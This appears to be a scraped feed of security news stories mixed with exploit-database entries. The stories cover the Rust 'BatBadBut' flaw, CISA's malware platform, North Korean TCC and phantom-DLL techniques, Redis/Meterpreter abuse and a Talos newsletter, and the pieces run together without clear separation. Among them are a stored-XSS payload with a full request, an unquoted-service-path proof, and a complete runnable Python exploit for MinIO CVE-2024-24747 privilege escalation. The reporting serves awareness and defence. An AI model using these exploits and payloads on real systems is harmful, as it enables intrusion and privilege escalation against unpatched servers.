By Deeba Ahmed
Critical 'BatBadBut' Flaw in Windows Lets Hackers Inject Commands (Patch Now!)
This is a post from HackRead.com Read the original post: Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

Flatt Security has discovered a critical vulnerability called “BatBadBut” that could allow attackers to inject malicious commands into Windows applications. The flaw, discovered by Flatt Security’s security engineer RyotaK, affects multiple programming languages. It was reported to the CERT Coordination Center and registered as CVE-2024-24576 on GitHub with a severity score of 10.0.

****What’s the Issue?****

Windows Rust developers are being urged to update their versions due to a critical vulnerability called ‘BatBadBut’, which could lead to malicious command injections on machines. The vulnerability affects the Rust standard library, which improperly escaped arguments when invoking batch files on Windows using the Command API.

BatBadBut vulnerability allows attackers to inject commands into Windows applications that rely on the ‘CreateProcess’ function. This is because cmd.exe, which executes batch files, has complex parsing rules and programming language runtimes fail to escape command arguments properly.

****Why it Occurs?****

The ‘BatBadBut’ issue occurs from the interaction between programming languages and the Windows operating system. When a program calls the “CreateProcess” function, Windows launches a separate process, “cmd.exe,” to handle the execution. This separate process parses the commands in the .bat file. 

For your information, Windows by default includes .bat and.cmd files in the PATHEXT environment variable, which can cause runtimes to execute batch files against developers’ intentions. An attacker can inject commands into Windows applications by controlling the command arguments section of batch files. To do this, the application must execute a command on Windows, specify the command file extension, control the command arguments, and fail to escape them.

“Some runtimes execute batch files against the developers’ intention if there is a batch file with the same name as the command that the developer intended to execute,” ” Ryotak explained.

****Impacted Applications****

Haskell process library, Rust, Node.js, PHP, and yt-dlp are affected by this bug. The Rust Security Response Working Group was notified on April 9 2024 that the Rust standard library, which is used to invoke batch files on Windows, is not properly escaping arguments, allowing attackers to execute arbitrary shell commands by bypassing the escaping. Haskell, Rust, and yt-dlp have issued patches.  

Ryotak reports that this isn’t an “internet breaking vulnerability” and most applications are not affected by it with several mitigations already available. Some programming languages have addressed it by adding an escaping mechanism. In addition, BatBadBut only affects Rust versions before 1.77.2, affecting no other platform or use.

****Mitigation Strategies:****

Researchers advise developers to exercise caution when using functions that interact with external processes, especially when dealing with user-supplied data. They recommend validating and sanitizing user input before incorporating it into commands, using safe alternatives, and staying updated with the latest security patches and fixes provided by framework and library developers.

1.  Rust-Based macOS Backdoor Linked to Ransomware Gangs
2.  Windows Defender SmartScreen Flaw Exploited with Malware
3.  Rust-Based Injector Deploys Remcos RAT in Multi-Stage Attack

Windows Apps Vulnerable to Command Injection via “BatBadBut” Flaw

But just how the government differentiates its platform from similar private-sector options remains to be seen.

Source: Bits And Splits via Shutterstock

The US Cybersecurity and Infrastructure Security Agency (CISA) has given organizations a new resource for analyzing suspicious and potentially malicious files, URLs, and IP addresses by making its Malware Next-Gen Analysis platform available to everyone earlier this week.

The question now is how organizations and security researchers will use the platform and what kind of new threat intelligence it will enable beyond what is available via VirusTotal and other malware analysis services.

The Malware Next-Gen platform uses dynamic and static analysis tools to analyze submitted samples and determine if they are malicious. It gives organizations a way to obtain timely and actionable information on new malware samples, such as the functionality and actions a string of code can execute on a victim system, CISA said. Such intelligence can be crucial to enterprise security teams for threat hunting and incident response purposes, the agency noted.

"Our new automated system enables CISA's cybersecurity threat hunting analysts to better analyze, correlate, enrich data, and share cyber threat insights with partners," said Eric Goldstein, CISA's executive assistant director for cybersecurity, in a prepared statement. "It facilitates and supports rapid and effective response to evolving cyber threats, ultimately safeguarding critical systems and infrastructure."

Since CISA rolled out the platform last October, some 400 registered users from various US federal, state, local, tribal, and territorial government agencies have submitted samples for analysis to Malware Next-Gen. Of the more than 1,600 files that users have submitted so far, CISA identified about 200 as suspicious files or URLs.

With CISA's move this week to make the platform available to everyone, any organization, security researcher, or individual can submit malicious files and other artifacts for analysis and reporting. CISA will provide analysis only to registered users on the platform.

Jason Soroko, senior vice president of product at certificate lifecycle management vendor Sectigo, says the promise of CISA's Malware Next-Generation Analysis platform lies in the insight it can potentially provide. "Other systems concentrate on answering the question 'has this been seen before and is it malicious'," he notes. "CISA's approach might end up being prioritized differently to become 'is this sample malicious, what does it do, and has this been seen before'."

Several platforms — VirusTotal is the most widely known — are currently available that use multiple antivirus scanners and static and dynamic analysis tools to analyze files and URLs for malware and other malicious content. Such platforms serve as a sort of centralized resource for known malware samples and associated behavior that security researchers and teams can use to identify and assess risk associated with new malware.

How different CISA's Malware Next-Gen will be from these offerings remains unknown.

"At this time, the US government has not detailed what makes this different from other open source sandbox analysis options that are available," Soroko says. The access that registered users will get to analysis of malware targeted at US government agencies could be valuable, he says. "Getting access to CISA's in-depth analysis would be the reason to participate. It remains to be seen for those of us outside of the US government if this is better or the same as other open source sandbox analysis environments."

**Making a Difference**

Callie Guenther, senior manager, cyber threat research at Critical Start, says it's possible that some organizations might initially be a bit cautious about contributing samples and other artifacts to a government-run platform because of data confidentiality and compliance issues. But the potential upside from a threat intelligence standpoint could encourage participation, Guenther notes. "The decision to share with CISA will likely consider the balance between enhancing collective security and safeguarding sensitive information."

CISA can differentiate its platform and deliver more value by investing in capabilities that enable it to detect sandbox-evading malware samples, says Saumitra Das, vice president of engineering at Qualys. "CISA should try to invest in both AI-based classification of malware samples as well as tamper-resistant dynamic analysis techniques … that could better uncover \[indicators of compromise\]," he says.

A larger focus on malware targeting Linux systems would also be a big improvement, Das says. "A lot of the current focus is on Windows samples from EDR use cases but with \[Kubernetes\] and cloud-native migration happening, Linux malware is on the rise and are quite different in their structure," from Windows malware, he says.

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

CISA's Malware Analysis Platform Could Foster Better Threat Intel

Terratec dmx_6fire USB version 1.23.0.02 suffers from an unquoted service path vulnerability.

    # Exploit Title:  Terratec dmx_6fire USB - Unquoted Service Path# Google Dork: null# Date: 4/10/2024# Exploit Author: Joseph Kwabena Fiagbor# Vendor Homepage: https://dmx-6fire-24-96-controlpanel.software.informer.com/download/# Software Link:# Version: v.1.23.0.02# Tested on: windows 7-11# CVE : CVE-2024-318041. Description:The Terratec dmx_6fire usb installs as a service with an unquoted servicepath runningwith SYSTEM privileges.This could potentially allow an authorized but non-privileged localuser to execute arbitrary code with elevated privileges on the system.2. Proof> C:\Users\Astra>sc qc "ttdmx6firesvc"> {SC] QueryServiceConfig SUCCESS>> SERVICE_NAME: ttdmx6firesvc>         TYPE               : 10  WIN32_OWN_PROCESS>         START_TYPE         : 2   AUTO_START>         ERROR_CONTROL      : 1   NORMAL>         BINARY_PATH_NAME   : C:\Program Files\TerraTec\DMX6FireUSB\ttdmx6firesvc.exe -service>         LOAD_ORDER_GROUP   : PlugPlay>         TAG                : 0>         DISPLAY_NAME       : DMX6Fire Control>         DEPENDENCIES       : eventlog>                            : PlugPlay>         SERVICE_START_NAME : LocalSystem>>

Terratec dmx_6fire USB 1.23.0.02 Unquoted Service Path

WordPress Playlist for Youtube plugin version 1.32 suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Wordpress Plugin Playlist for Youtube - Stored Cross-Site Scripting (XSS)# Date: 22 March 2024# Exploit Author: Erdemstar# Vendor: https://wordpress.com/# Version: 1.32# Proof Of Concept:1. Click Add a new playlist and enter the XSS payload as below into the properties named "Name" or "Playlist ID".# PoC Video: https://www.youtube.com/watch?v=jrH5OHBoTns# Vulnerable Properties name: name, playlist_id# Payload: "><script>alert(document.cookie)</script># Request:POST /wp-admin/admin.php?page=playlists_yt_free HTTP/2Host: erdemstar.localCookie: thc_time=1713843219; booking_package_accountKey=2; wordpress_sec_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7C27abdae5aa28462227b32b474b90f0e01fa4751d5c543b281c2348b60f078d2f; wp-settings-time-4=1711124335; cld_2=like; _hjSessionUser_3568329=eyJpZCI6ImY4MWE3NjljLWViN2MtNWM5MS05MzEyLTQ4MGRlZTc4Njc5OSIsImNyZWF0ZWQiOjE3MTEzOTM1MjQ2NDYsImV4aXN0aW5nIjp0cnVlfQ==; wp-settings-time-1=1712096748; wp-settings-1=mfold%3Do%26libraryContent%3Dbrowse%26uploader%3D1%26Categories_tab%3Dpop%26urlbutton%3Dfile%26editor%3Dtinymce%26unfold%3D1; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_dd86dc85a236e19160e96f4ec4b56b38=admin%7C1714079650%7CIdP5sIMFkCzSNzY8WFwU5GZFQVLOYP1JZXK77xpoW5R%7Cc64c696fd4114dba180dc6974e102cc02dc9ab8d37482e5c4e86c8e84a1f74f9Content-Length: 178Cache-Control: max-age=0Sec-Ch-Ua: "Not(A:Brand";v="24", "Chromium";v="122"Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: "macOS"Upgrade-Insecure-Requests: 1Origin: https://erdemstar.localContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://erdemstar.local/wp-admin/admin.php?page=playlists_yt_freeAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Priority: u=0, i_wpnonce=17357e6139&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dplaylists_yt_free&name="><script>alert(document.cookie)</script>&playlist_id=123&template=1&text_size=123&text_color=%23000000

WordPress Playlist For Youtube 1.32 Cross Site Scripting

MinIO versions prior to 2024-01-31T20-20-33Z suffer from a privilege escalation vulnerability.

    # Exploit Title: MinIO < 2024-01-31T20-20-33Z -  Privilege Escalation# Date: 2024-04-11# Exploit Author: Jenson Zhao# Vendor Homepage: https://min.io/# Software Link: https://github.com/minio/minio/# Version: Up to (excluding) RELEASE.2024-01-31T20-20-33Z# Tested on: Windows 10# CVE : CVE-2024-24747# Required before execution: pip install minio,requestsimport argparseimport datetimeimport tracebackimport urllibfrom xml.dom.minidom import parseStringimport requestsimport jsonimport base64from minio.credentials import Credentialsfrom minio.signer import sign_v4_s3class CVE_2024_24747:    new_buckets = []    old_buckets = []    def __init__(self, host, port, console_port, accesskey, secretkey, verify=False):        self.bucket_names = ['pocpublic', 'pocprivate']        self.new_accesskey = 'miniocvepoc'        self.new_secretkey = 'MINIOcvePOC'        self.headers = {          'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36',          'Content-Type': 'application/json',          'Accept': '*/*'        }        self.accesskey = accesskey        self.secretkey = secretkey        self.verify = verify        if verify:            self.url = "https://" + host + ":" + port            self.console_url = "https://" + host + ":" + console_port        else:            self.url = "http://" + host + ":" + port            self.console_url = "http://" + host + ":" + console_port        self.credits = Credentials(            access_key=self.new_accesskey,            secret_key=self.new_secretkey        )        self.login()        try:            self.create_buckets()            self.create_accesskey()            self.old_buckets = self.console_ls()            self.console_exp()            self.new_buckets = self.console_ls()        except:            traceback.print_stack()        finally:            self.delete_accesskey()            self.delete_buckets()            if len(self.new_buckets) > len(self.old_buckets):                print("There is CVE-2024-24747 problem with the minio!")                print("Before the exploit, the buckets are : " + str(self.old_buckets))                print("After the exploit, the buckets are : " + str(self.new_buckets))            else:                print("There is no CVE-2024-24747 problem with the minio!")    def login(self):        url = self.url + "/api/v1/login"        payload = json.dumps({          "accessKey": self.accesskey,          "secretKey": self.secretkey        })        self.session = requests.session()        if self.verify:            self.session.verify = False        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 204:            status_code = 0        else:            print('Login failed! Please check if the input accesskey and secretkey are correct!')            exit(1)    def create_buckets(self):        url = self.url + "/api/v1/buckets"        for name in self.bucket_names:            payload = json.dumps({                "name": name,                "versioning": False,                "locking": False            })            status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code            # print(status_code)            if status_code == 200:                status_code = 0            else:                print("新建 (New)"+name+" bucket 失败 (fail)！")    def delete_buckets(self):        for name in self.bucket_names:            url = self.url + "/api/v1/buckets/" + name            status_code = self.session.request("DELETE", url, headers=self.headers).status_code            # print(status_code)            if status_code == 204:                status_code = 0            else:                print("删除 (delete)"+name+" bucket 失败 (fail)！")    def create_accesskey(self):        url = self.url + "/api/v1/service-account-credentials"        payload = json.dumps({            "policy": "{              \n    \"Version\":\"2012-10-17\",              \n    \"Statement\":[              \n        {              \n            \"Effect\":\"Allow\",              \n            \"Action\":[              \n                \"s3:*\"              \n            ],              \n            \"Resource\":[              \n                \"arn:aws:s3:::pocpublic\",              \n                \"arn:aws:s3:::pocpublic/*\"              \n            ]              \n        }              \n    ]              \n}",            "accessKey": self.new_accesskey,            "secretKey": self.new_secretkey        })        status_code = self.session.request("POST", url, headers=self.headers, data=payload).status_code        # print(status_code)        if status_code == 201:            # print("新建 (New)" + self.new_accesskey + " accessKey 成功 (success)！")            # print(self.new_secretkey)            status_code = 0        else:            print("新建 (New)" + self.new_accesskey + " accessKey 失败 (fail)！")    def delete_accesskey(self):        url = self.url + "/api/v1/service-accounts/" + base64.b64encode(self.new_accesskey.encode("utf-8")).decode('utf-8')        status_code = self.session.request("DELETE", url, headers=self.headers).status_code        # print(status_code)        if status_code == 204:            # print("删除" + self.new_accesskey + " accessKey成功！")            status_code = 0        else:            print("删除 (delete)" + self.new_accesskey + " accessKey 失败 (fail)！")    def headers_gen(self,url,sha256,method):        datetimes = datetime.datetime.utcnow()        datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ')        urls = urllib.parse.urlparse(url)        headers = {            'X-Amz-Content-Sha256': sha256,            'X-Amz-Date': datetime_str,            'Host': urls.netloc,        }        headers = sign_v4_s3(            method=method,            url=urls,            region='us-east-1',            headers=headers,            credentials=self.credits,            content_sha256=sha256,            date=datetimes,        )        return headers    def console_ls(self):        url = self.console_url + "/"        sha256 = "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"        headers = self.headers_gen(url,sha256,'GET')        if self.verify:            response = requests.get(url,headers=headers,verify=False)        else:            response = requests.get(url, headers=headers)        DOMTree = parseString(response.text)        collection = DOMTree.documentElement        buckets = collection.getElementsByTagName("Bucket")        bucket_names = []        for bucket in buckets:            bucket_names.append(bucket.getElementsByTagName("Name")[0].childNodes[0].data)        # print('当前可查看的bucket有:\n' + str(bucket_names))        return bucket_names    def console_exp(self):        url = self.console_url + "/minio/admin/v3/update-service-account?accessKey=" + self.new_accesskey        sha256 = "0f87fd59dff29507f82e189d4f493206ea7f370d0ce97b9cc8c1b7a4e609ec95"        headers = self.headers_gen(url, sha256, 'POST')        hex_string = "e1fd1c29bed167d5cf4986d3f224db2994b4942291dbd443399f249b84c79d9f00b9e0c0c7eed623a8621dee64713a3c8c63e9966ab62fcd982336"        content = bytes.fromhex(hex_string)        if self.verify:            response = requests.post(url,headers=headers,data=content,verify=False)        else:            response = requests.post(url,headers=headers,data=content)        status_code = response.status_code        if status_code == 204:            # print("提升" + self.new_accesskey + " 权限成功！")            status_code = 0        else:            print("提升 (promote)" + self.new_accesskey + " 权限失败 (Permission failed)！")if __name__ == '__main__':    logo = """                            ____    ___   ____   _  _           ____   _  _    _____  _  _    _____   ___ __   __  ___        |___ \  / _ \ |___ \ | || |         |___ \ | || |  |___  || || |  |___  | / __|\ \ / / / _ \ _____   __) || | | |  __) || || |_  _____   __) || || |_    / / | || |_    / / | (__  \ V / |  __/|_____| / __/ | |_| | / __/ |__   _||_____| / __/ |__   _|  / /  |__   _|  / /   \___|  \_/   \___|       |_____| \___/ |_____|   |_|         |_____|   |_|   /_/      |_|   /_/                               """    print(logo)    parser = argparse.ArgumentParser()    parser.add_argument("-H", "--host", required=True, help="Host of the target. example: 127.0.0.1")    parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin")    parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin")    parser.add_argument("-c", "--console_port", required=True, help="Minio console port of the target. example: 9000")    parser.add_argument("-p", "--port", required=True, help="Minio port of the target. example: 9090")    parser.add_argument("--https", action='store_true', help="Is MinIO accessed through HTTPS.")    args = parser.parse_args()    CVE_2024_24747(args.host,args.port,args.console_port,args.accesskey,args.secretkey,args.https)

MinIO Privilege Escalation

Project behind the Rust programming language asserted that any calls to a specific API would be made safe, even with unsafe inputs, but researchers found ways to circumvent the protections.

Source: Monticello via Shutterstock

The Rust Project has issued an update for its standard library, after a vulnerability researcher discovered a specific function used to execute batch files on Windows systems could be exploited using an injection flaw.

The set of common functions included with Rust programming language, known as the standard library, offers the ability — among its many other capabilities — to execute Windows batch files through the Command API. The function, however, did not process the inputs to the API rigorously enough to eliminate the possibility of injecting code into the execution, according to a Rust Security Response Working Group advisory published April 9.

While Rust is well known for its memory-safety features, the incident underscores that the programming language is not proof against logic bugs, says Yair Mizrahi, a senior vulnerability researcher at application-security firm JFrog.

"Overall, Rust's memory safety is a notable advantage, but developers must also pay close attention to the potential for logical bugs to ensure the overall security and reliability of their Rust-based applications," he says. "To address such logical issues, Rust encourages a rigorous testing and code review process, as well as the use of static analysis tools to identify and mitigate logical bugs."

Rust has gained a reputation for being a very secure programming language, because it does not leave applications open to the often-severe class of flaws known as memory-safety vulnerabilities. Google has attributed a drop in memory-unsafe code to the shift to memory-safe languages, such as Rust and Kotlin, while Microsoft found that up until 2018, when it shifted to memory-safe language, such vulnerabilities regularly accounted for 70% of all security issues.

**Windows Poses a Batch of Issues**

The latest issue is not a memory-safety vulnerability, but a problem with the logic used to process untrusted input. Part of Rust's standard library allows the developer to call a function to send a batch file to the Windows machine for processing. There are reasons for submitting code to the host as a batch file, says Joel Marcey, director of technology at Rust Foundation, which supports the programming language's maintainers and the Rust ecosystem.

"Batch files are run for many reasons on systems, and Rust provides an API to allow you to execute those fairly easily," he says. "So while this is not necessarily the most common use case for Rust, the API, before the fixed patch was implemented, allowed for malicious actors to theoretically take over your system by running arbitrary commands, and this is definitely a critical vulnerability."

Typically, a developer can forward a workload to the Windows host to be executed as a batch process through the Command applications programming interface (API), part of the standard library. Typically, Rust guarantees the safety of any call to the Command API, but in this case, the Rust Project could not find a way to prevent the execution of all arguments, primarily because Windows does not adhere to any sort of standard, and that the API could allow an attacker to submit code that would then be executed.

"Unfortunately it was reported that our escaping logic was not thorough enough, and it was possible to pass malicious arguments that would result in arbitrary shell execution," according to the Rust Security Response WG.

**Rust Project Proves Responsive**

While dealing with any vulnerability can be a headache, the Rust Project has shown that the group quickly resolves issues, say experts. The standard library vulnerability, CVE-2024-24576, is ultimately an issue with the Windows batch-processing problem and affects other programming languages, if they do not adequately parse the arguments sent to the Windows batch process. The Rust Project appears to be the first out the door with a fix for passing arguments to the Windows CMD.exe process, says JFrog's Mizrahi.

The groups could not completely eliminate the issue, but the Command API will not return an error when any augments passed to the function could be unsafe, the Rust Project said. 

JFrog's Mizrahi urges Rust to broaden its use of static application security testing and expand the use of fuzzing and dynamic testing.

"Overall, Rust is on the right track by emphasizing memory safety and encouraging rigorous testing practices," he says. "Combining these efforts with continued advancements in static analysis and fuzzing can help the Rust community and the broader software industry make significant strides in addressing logical bugs and input validation flaws in the years to come."

**About the Author(s)**

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.

Critical Rust Flaw Poses Exploit Threat in Specific Windows Use Cases

North Korean hackers break ground with new exploitation techniques for Windows and macOS.

Source: Stuart Miles via Alamy Stock Photo

This month, MITRE will be adding two sub-techniques to its ATT&CK database that have been widely exploited by North Korean threat actors.

The first, not entirely new, sub-technique involves manipulation of Transparency, Consent, and Control (TCC), a security protocol that regulates application permissions on Apple's macOS.

The other — called "phantom" dynamic link library (DLL) hijacking — is a lesser-known subset of DLL hijacking, where hackers take advantage of referenced but nonexistent DLL files in Windows.

Both TCC manipulation and phantom DLL hijacking have allowed North Korean hackers to gain privileged access into macOS and Windows environments, respectively, from which they could perform espionage and other post-exploitation actions.

**TCC Manipulation**

"North Korea is opportunistic," says Marina Liang, threat intelligence engineer at Interpres Security. "They have a dual purpose of espionage and also revenue generation, so they're going to look to be where their targets are. And because macOS is increasing in popularity, that's where they started to pivot."

One way North Korean advanced persistent threats (APTs) have been breaching Macs lately is via TCC, an essential framework for controlling application permissions.

TCC has a user- and system-level database. The former is protected with permissions — a user would require Full Disk Access (FDA), or something similar — and the latter by System Integrity Protection (SIP), a feature first introduced with macOS Sierra. Theoretically, privileges and SIP are guards against malicious TCC access.

In practice, however, there are scenarios where each can be undermined. Administrators and security apps, for example, might require FDA to properly function. And there are times when users circumvent SIP.

"When developers need flexibility on their machine, or they're being blocked by the operating system, they might decrease those controls that Apple has in place to allow them to code and create software," Liang explains. "Anecdotally, I've seen that developers troubleshooting will try to figure out what's in place \[on the system\], and disable it to see if that solves their issue."

When SIP is switched off, or FDA on, attackers have a window to access the TCC database and grant themselves permissions without alerting the user.

There are a number of other ways to potentially get through TCC, too. For example, some sensitive directories such as /tmp fall outside of TCC's domain entirely. The Finder app has FDA enabled by default, and it's not listed in the user's Security & Privacy window, meaning that a user would have to be independently aware and manually revoke its permissions. Attackers can also use social engineering to direct users in disabling security controls.

A number of malware tools have been designed to manipulate TCC, including Bundlore, BlueBlood, Callisto, JokerSpy, XCSSET, and other unnamed macOS Trojans recorded on VirusTotal. Liang identified Lazarus Group malware, which attempts to dump the access table from the TCC database, and CloudMensis by APT37 (aka InkSquid, RedEyes, BadRAT, Reaper, or ScarCruft) doggedly tries to identify where SIP is disabled in order to load its own malicious database.

Dark Reading contacted Apple for a statement regarding TCC abuses and received no reply.

To block attackers taking advantage of TCC, the most important thing is keeping SIP enabled. Short of that, Liang highlights the need to know which apps have what permissions in your system. "It's being aware of what you're granting permissions to. And then — obviously it's easier said than done — exercising \[the principle of\] least privileged \[access\]. If certain apps don't necessarily need certain permissions to function, then remove them," she says.

Besides TCC vulnerabilities, APAC-area threat actors have been exploiting an even stranger flaw in Windows. For some reason, the operating system references a number of DLL files that don't actually exist.

"There are a ton of them," Liang marvels. "Maybe someone was working on a project to create specific DLLs for specific purposes, and maybe it got shelved, or they didn't have enough resources, or just forgot about it."

Dark Reading has reached out to Microsoft for clarification on this point.

To a hacker, a so-called "phantom" DLL file is like a blank canvas. They can simply create their own malicious DLLs with the same name, and write them to the same location, and they'll be loaded by the operating system with nobody the wiser.

The Lazarus Group and APT 41 (aka Winnti, Barium, Double Dragon) have used this tactic with IKEEXT, a service necessary for authentication and key exchange within Internet protocol security. When IKEEXT triggers, it attempts to load the nonexistent "wlbsctrl.dll." APT41 has also targeted other phantom DLLs like "wbemcomn.dll," loaded by the Windows Management Instrumentation (WMI) provider host.

Until Windows rids itself of phantom DLLs, Liang highly recommends companies run monitoring solutions, deploy proactive application controls, and automatically block remote loading of DLLs, a feature included by default in Windows Server.

**About the Author(s)**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

DPRK Exploits 2 MITRE Sub-Techniques: Phantom DLL Hijacking, TCC Abuse

Attackers have compromised an 8-year-old version of the cloud platform to distribute various malware that can take over infected systems.

Source: Age Foto Stock via Alamy Stock Photo

Attackers are using an 8-year-old version of the Redis open-source database server to maliciously use Metasploit's Meterpreter module to expose exploits within a system, potentially allowing for takeover and distribution of a host of other malware.

Researchers from AhnLab Security Intelligence Center (ASEC) said in a blog post that attackers likely are exploiting inappropriate settings or a vulnerability present in an implementation of Redis to distribute Meterpreter for nefarious use.

"Such malware strains attack Redis servers open to the public on the Internet with the authentication feature disabled," ASEC researcher Sanseo wrote in the post. "After gaining access to Redis, threat actors can install malware through known attack methods."

Meterpreter is an aspect of the legitimate Metasploit pen-testing tool that allows threat actors to fetch various Metasploit modules, or working exploits for known bugs, and then use them on the targeted system, according to ASEC. Metasploit is a tool similar to Cobalt Strike that also is oft-abused by threat actors to execute attacks.

"When Metasploit is installed, the threat actor can take control of the infected system and also dominate the internal network of an organization using the various features offered by the malware," Senseo explained.

**How It's Done**

Redis is an open source, in-memory data structure storage service that is increasingly being used in various ways in cloud environments; its primary purpose is typically for session management, message broker, and queues, according to ASEC. This increased prevalence also is making it a more popular target for attackers, who have abused vulnerable Redis servers to spread a host of malware, including Kinsing, P2PInfect, Skidmap, Migo, and HeadCrab.

By using Metasploit Meterpreter, there are two main attacks methods that actors can employ to spread malware once they've gained access to Redis. One is to register the malware-executing command as a Cron task, and the other is using the SLAVEOF command to set the command as the Slave server of the Redis server that has the malware.

ASEC witnessed an attack targeting a system that used Windows, along with version Redis 3.x, which was developed in 2016. The age of the abused platform means "it was likely vulnerable to attacks that abuse misconfiguration or attacks on known vulnerabilities," Senseo noted.

In the attack, the threat actor first downloaded PrintSpoofer, a privilege escalation tool, in the installation path for Redis. Attackers often use this tool against vulnerable services that are not managed properly or have not been patched to the recent version; in fact, ASEC has witnessed a flurry of these attacks against Redis since the second half of last year.

"The difference between the cases from the past and the cases now is that PrintSpoofer is installed using the CertUtil tool instead of PowerShell," Senseo explained.

**Meterpreter As Malicious Backdoor**

After installing PrintSpoofer, the threat actor installed Meterpreter Stager — one of two types of the module, the difference between which depends on the way it is installed. Meterpreter is to the Metasploit tool as Beacon is to Cobalt Strike.

When an attacker uses Stager, it means the installation is via the staged version, which downloads Meterpreter directly from the attacker's command-and-control (C2) server. This decreases its footprint version downloading it in a "stageless" way within a payload, according to ASEC.

Once this process is complete, Meterpreter is executed in the memory, which allows the threat actor to take control over the infected system and "also dominate the internal network of an organization using the various features offered by the malware," Senseo wrote.

**Update Now**

ASEC included a list of files, behaviors, and indicators of compromise of the attack in its post to help network administrators identify evidence of the threat on a system.

To avoid being compromised by the attack vector, ASEC advised that administrators of environments with Redis 3.x installed should, at the very least, update the server immediately with available patches to ensure that known vulnerabilities can't be exploited. The best-case scenario, however, would be to update V3 to the latest version of the server.

Administrators should also install security-protection software that restricts external access to Redis servers open to the Internet so they can't be identified and abused, ASEC advised.

**About the Author(s)**

Elizabeth Montalbano is a freelance writer, journalist, and therapeutic writing mentor with more than 25 years of professional experience. Her areas of expertise include technology, business, and culture. Elizabeth previously lived and worked as a full-time journalist in Phoenix, San Francisco, and New York City; she currently resides in a village on the southwest coast of Portugal. In her free time, she enjoys surfing, hiking with her dogs, traveling, playing music, yoga, and cooking.

Expired Redis Service Abused to Use Metasploit Meterpreter Maliciously

The security community is still reflecting on the “What If” of the XZ backdoor.

Thursday, April 11, 2024 14:00

I feel like over the past several years, the “holiday” that is April Fool’s Day has really died down. At this point, there are few headlines you can write that would be more ridiculous than something you’d find on a news site any day of the week. 

And there are so many more serious issues that are developing, too, that making a joke about a fake news story is just in bad taste, even if it’s in “celebration” of a “holiday.” 

Thankfully in the security world, I think we’ve all gotten the hint at this point that we can’t just post whatever we want on April 1 of each calendar year and expect people to get the joke. I’ve put my guard down so much at this point that I actually did legitimately fall for one April Fool’s joke from Nintendo, because I could definitely see a world in which they release a Virtual Boy box for the Switch that would allow you to play virtual reality games. 

But at least from what I saw on April 1 of this year, no one tried to “get” anyone with an April Fool’s joke about a ransomware actor requesting payment in the form of “Fortnite” in-game currency, or an internet-connected household object that in no universe needs to be connected to the internet (which, as it turns out, smart pillows exist!).  

We’re already dealing with digitally manipulated photos of “Satanic McDonalds,” Twitter’s AI generating fake news about the solar eclipse, and an upcoming presidential election that is sure to generate a slew of misinformation, AI-generated photos and more that I hesitate to even make up. 

So, all that is to say, good on you, security community, for just letting go of April Fool’s. Our lives are too stressful without bogus headlines that we, ourselves, generate.  

**The one big thing **

Talos discovered a new threat actor we’re calling “CoralRaider” that we believe is of Vietnamese origin and financially motivated. CoralRaider has been operating since at least 2023, targeting victims in several Asian and Southeast Asian countries. This group focuses on stealing victims’ credentials, financial data, and social media accounts, including business and advertisement accounts. CoralRaider appears to use RotBot, a customized variant of QuasarRAT, and XClient stealer as payloads. The actor uses the dead drop technique, abusing a legitimate service to host the C2 configuration file and uncommon living-off-the-land binaries (LoLBins), including Windows Forfiles.exe and FoDHelper.exe 

**Why do I care? **

This is a brand new actor that we believe is acting out of Vietnam, traditionally not a country who is associated with high-profile state-sponsored actors. CoralRaider appears to be after targets’ social media logins, which can later be leveraged to spread scams, misinformation, or all sorts of malicious messages using the victimized account. 

**So now what? **

CoralRaider primarily uses malicious LNK files to spread their malware, though we currently don’t know how those files are spread, exactly. Threat actors have started shifting toward using LNK files as an initial infection vector after Microsoft disabled macros by default — macros used to be a primary delivery system. For more on how the info in malicious LNK files can allow defenders to learn more about infection chains, read our previous research here. 

**Top security headlines of the week **

